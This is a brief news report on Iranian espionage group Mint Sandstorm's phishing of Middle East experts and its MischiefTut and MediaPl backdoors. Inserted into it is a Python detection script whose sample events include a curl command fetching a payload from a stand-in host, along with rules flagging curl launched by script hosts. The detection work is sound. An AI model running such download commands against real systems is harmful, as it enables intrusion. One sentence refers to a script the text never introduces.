Iranian cyber espionage group Mint Sandstorm attacks Middle East experts

19 January 2024 · 2 minutes · Author: Newsman


In a complex series of cyberattacks that began in November 2023, the Iranian group Mint Sandstorm, which is potentially linked to Iran’s Islamic Revolutionary Guard Corps, targeted Middle Eastern experts.

The group, also known as APT35, Charming Kitten, TA453 and Yellow Garuda, uses malware, including the new “MediaPl” backdoor, to refine its post-intrusion strategies. These attacks are part of nation-state intelligence-gathering efforts. The modus operandi involves using compromised email accounts and curl commands to connect to the command and control (C2) infrastructure.

The latest set of intrusions is characterized by the use of decoys tied to the Israel-Hamas war: innocuous emails impersonating journalists and other high-profile individuals are sent to build rapport with targets and establish a level of trust before any attempt to deliver malware. Microsoft said the campaign was likely an attempt by the nation-state actor to gather views on war-related events.

This script paves the way for more sinister payloads such as MischiefTut and MediaPl. MischiefTut, a PowerShell-implemented backdoor first spotted in late 2022, is capable of executing intelligence commands and downloading tools onto compromised systems. MediaPl masquerades as Windows Media Player and can send encrypted commands to the C2 server.
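The two behaviours this article attributes to the campaign, curl invoked to reach the C2 infrastructure and a backdoor posing as Windows Media Player, are the kind of thing a detection engineer would write a first-pass hunt for. The Python below is an added example and is not from the article or from Microsoft's reporting: the process-creation events are constructed, not real telemetry, and the list of parent processes treated as suspicious, the URL extraction, and the directories treated as the legitimate Windows Media Player install location are my assumptions, not published indicators for MediaPl or MischiefTut.

```python
import ntpath
import re

# Constructed sample process-creation events, loosely shaped like Sysmon
# Event ID 1 (parent image, image, command line). None of these paths or
# hosts are real indicators; example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o C:\Users\u\AppData\Local\Temp\a.dat http://example.invalid/a"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "cmdline": r'"C:\Program Files\Windows Media Player\wmplayer.exe"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\u\AppData\Roaming\wmplayer.exe",
     "cmdline": r"C:\Users\u\AppData\Roaming\wmplayer.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://example.invalid/"},  # operator at a console: lower signal
]

# Assumption: script hosts and mail/Office clients are unusual parents for curl.exe
# on a workstation; a console shell (cmd.exe) is deliberately left out to cut noise.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "winword.exe", "excel.exe", "outlook.exe",
}

# Assumption: the only directories where the genuine wmplayer.exe should live.
LEGIT_WMP_DIRS = {
    r"c:\program files\windows media player",
    r"c:\program files (x86)\windows media player",
}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def dirname(path: str) -> str:
    """Lower-cased directory of a Windows path."""
    return ntpath.dirname(path).lower()


def curl_from_script_host(ev: dict) -> bool:
    """curl.exe launched by a script host or Office client rather than a user shell."""
    return basename(ev["image"]) == "curl.exe" and basename(ev["parent"]) in SCRIPT_HOSTS


def wmplayer_masquerade(ev: dict) -> bool:
    """A binary borrowing the Windows Media Player name outside its install directory."""
    return basename(ev["image"]) == "wmplayer.exe" and dirname(ev["image"]) not in LEGIT_WMP_DIRS


RULES = {
    "curl-from-script-host": curl_from_script_host,
    "wmplayer-masquerade": wmplayer_masquerade,
}


def triage(events: list) -> list:
    """Run every rule over every event; return one hit per (event, rule) match.

    Each hit carries any URLs pulled from the command line so an analyst can
    pivot on the contacted host without re-reading the raw event.
    """
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append({
                    "event": idx,
                    "rule": name,
                    "parent": basename(ev["parent"]),
                    "urls": URL_RE.findall(ev["cmdline"]),
                })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Both rules are deliberately narrow so they stay quiet on a normal workstation; the expected tuning step is to add the parents and install paths seen in your own environment rather than to loosen the matches. Event 3, curl run interactively from cmd.exe, is intentionally not flagged.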

Such tools show Mint Sandstorm continuing to adapt its tooling to maintain a covert presence in target environments, highlighting the group’s sophistication.
